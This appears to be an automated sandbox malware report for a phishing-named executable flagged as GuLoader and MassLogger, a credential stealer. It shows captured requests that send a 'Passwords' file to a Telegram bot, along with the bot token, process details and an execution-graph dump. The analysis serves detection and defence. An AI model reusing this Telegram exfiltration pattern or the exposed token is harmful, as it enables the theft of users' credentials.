                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1ee4c9083d38
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:45:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 65 34 63 39 30 38 33 64 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1ee4c9083d38Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:21 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:21 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 544
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:21 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12255,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335121,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.549924149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:24 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1f0f291b1e8e
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 30 66 32 39 31 62 31 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1f0f291b1e8eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:25 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:25 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12256,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335125,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.549932149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:28 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1f3a96920953
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 33 61 39 36 39 32 30 39 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1f3a96920953Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:28 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:28 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:28 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12257,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335128,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.549943149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:31 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1f6860597c58
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 36 38 36 30 35 39 37 63 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1f6860597c58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:31 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:31 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:31 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12258,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335131,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.549955149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:35 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1fa6c0cb5abe
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-16 07:45:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 61 36 63 30 63 62 35 61 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1fa6c0cb5abeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:36 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:36 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:36 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12259,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335136,"document":{"file_n


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.549963149.154.167.220443616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-16 07:45:38 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1fe3675fc152
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-16 07:45:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 65 33 36 37 35 66 63 31 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1fe3675fc152Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-16 07:45:39 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 16 Dec 2024 07:45:39 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 543
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-16 07:45:39 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 32 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 33 35 31 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":12260,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734335139,"document":{"file_n


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:02:43:33
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:475'776 bytes
                                                                                                                                MD5 hash:FD9335D7160883534E42839297A65C7D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:02:44:22
                                                                                                                                Start date:16/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:475'776 bytes
                                                                                                                                MD5 hash:FD9335D7160883534E42839297A65C7D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:21.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                  Signature Coverage:20.8%
                                                                                                                                  Total number of Nodes:1517
                                                                                                                                  Total number of Limit Nodes:46
                                                                                                                                  execution_graph 4778 402840 4779 402bbf 18 API calls 4778->4779 4781 40284e 4779->4781 4780 402864 4783 405c05 2 API calls 4780->4783 4781->4780 4782 402bbf 18 API calls 4781->4782 4782->4780 4784 40286a 4783->4784 4806 405c2a GetFileAttributesW CreateFileW 4784->4806 4786 402877 4787 402883 GlobalAlloc 4786->4787 4788 40291a 4786->4788 4791 402911 CloseHandle 4787->4791 4792 40289c 4787->4792 4789 402922 DeleteFileW 4788->4789 4790 402935 4788->4790 4789->4790 4791->4788 4807 403258 SetFilePointer 4792->4807 4794 4028a2 4795 403242 ReadFile 4794->4795 4796 4028ab GlobalAlloc 4795->4796 4797 4028bb 4796->4797 4798 4028ef 4796->4798 4799 403027 32 API calls 4797->4799 4800 405cdc WriteFile 4798->4800 4801 4028c8 4799->4801 4802 4028fb GlobalFree 4800->4802 4804 4028e6 GlobalFree 4801->4804 4803 403027 32 API calls 4802->4803 4805 40290e 4803->4805 4804->4798 4805->4791 4806->4786 4807->4794 4808 10001000 4811 1000101b 4808->4811 4818 10001516 4811->4818 4813 10001020 4814 10001024 4813->4814 4815 10001027 GlobalAlloc 4813->4815 4816 1000153d 3 API calls 4814->4816 4815->4814 4817 10001019 4816->4817 4820 1000151c 4818->4820 4819 10001522 4819->4813 4820->4819 4821 1000152e GlobalFree 4820->4821 4821->4813 4822 401cc0 4823 402ba2 18 API calls 4822->4823 4824 401cc7 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401ccf GetDlgItem 4825->4826 4827 402531 4826->4827 4828 4029c0 4829 402ba2 18 API calls 4828->4829 4830 4029c6 4829->4830 4831 4029f9 4830->4831 4833 40281e 4830->4833 4834 4029d4 4830->4834 4832 406077 18 API calls 4831->4832 4831->4833 4832->4833 4834->4833 4836 405f9c wsprintfW 4834->4836 4836->4833 4198 403c41 4199 403d94 4198->4199 4200 403c59 4198->4200 4202 403de5 4199->4202 4203 403da5 GetDlgItem GetDlgItem 4199->4203 4200->4199 4201 403c65 4200->4201 4205 403c70 SetWindowPos 4201->4205 4206 403c83 4201->4206 4204 403e3f 4202->4204 4212 401389 2 API 